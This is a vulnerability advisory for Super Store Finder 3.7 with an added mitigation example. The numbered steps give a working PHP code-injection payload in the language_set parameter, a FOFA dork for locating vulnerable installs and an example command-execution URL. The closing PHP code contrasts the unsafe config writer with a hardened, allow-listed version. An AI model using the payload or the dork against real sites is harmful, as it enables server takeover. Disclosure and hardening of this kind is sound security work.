Super Store Finder 3.7 Remote Command Execution
2023-9-21 00:22:7 Author: cxsecurity.com

# Vulnerability : Authenticated Arbitrary PHP Code Injection leading to Remote Code Execution
# Researcher : Etharus
# Vendor : Joe Iz, https://www.superstorefinder.net/
# Demo Url : https://superstorefinder.net/products/superstorefinder/
# Version Affected : 3.7 and below
# Date : 18 September 2023
# FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Log in as user/admin
# Step 2 : Go to Settings at the top right
# Step 3 : Turn on a proxy to intercept the request and save the settings
# Step 4 : Set the language_set parameter to en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//
# Step 5 : Because index.php includes config.inc.php, the injected code can be reached with the parameter ?cmd=
# Step 6 : Example: http://localhost/?cmd=uname%20-a
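The root cause behind Steps 4 and 5 is that a settings value taken from the request is spliced verbatim into config.inc.php, which PHP then executes on every include. The following is an added example, not Super Store Finder's own code: a hypothetical settings writer showing that unsafe pattern beside a hardened version that allow-lists the locale and serializes it with var_export(); the variable name, file path and locale list are assumptions.

```php
<?php
// Added example (not the vendor's code): a hypothetical settings writer that
// shows why splicing a request parameter into a PHP config file is injectable,
// and a hardened writer that validates and serializes the value instead.

// UNSAFE pattern: the value lands inside PHP source text, so any input that
// can close the string literal also gets to append code that runs on include.
// Kept here only as the "before" case; never call it with request input.
function writeConfigUnsafe(string $path, string $lang): void
{
    file_put_contents($path, "<?php\n\$language_set = '" . $lang . "';\n");
}

// Allow-list of locales the application ships (assumed values for the example).
const ALLOWED_LOCALES = ['en_US', 'de_DE', 'es_ES', 'fr_FR'];

// Reject anything that is not a known locale tag. The regex is defence in
// depth: even if the allow-list is later loaded from a file, the shape check
// still excludes quotes, parentheses and other PHP syntax characters.
function validateLocale(string $lang): string
{
    if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang)
        || !in_array($lang, ALLOWED_LOCALES, true)) {
        throw new InvalidArgumentException('language_set is not an allowed locale');
    }
    return $lang;
}

// HARDENED pattern: validated input, emitted through var_export() so it is
// always a correctly quoted PHP string literal, and written atomically so a
// concurrent include never sees a half-written config.inc.php.
function writeConfigSafe(string $path, string $lang): void
{
    $lang = validateLocale($lang);
    $src  = "<?php\n\$language_set = " . var_export($lang, true) . ";\n";
    $tmp  = $path . '.tmp';
    file_put_contents($tmp, $src, LOCK_EX);
    rename($tmp, $path);
}

// Constructed demonstration values.
$config = sys_get_temp_dir() . '/config.inc.php';
writeConfigSafe($config, 'en_US');
echo file_get_contents($config);

try {
    writeConfigSafe($config, "en_US'); // tampered");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}
```

Storing settings in a non-executable format (for example JSON read back with json_decode) removes this bug class entirely, since a settings value can then never become code.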



Source: https://cxsecurity.com/issue/WLB-2023090065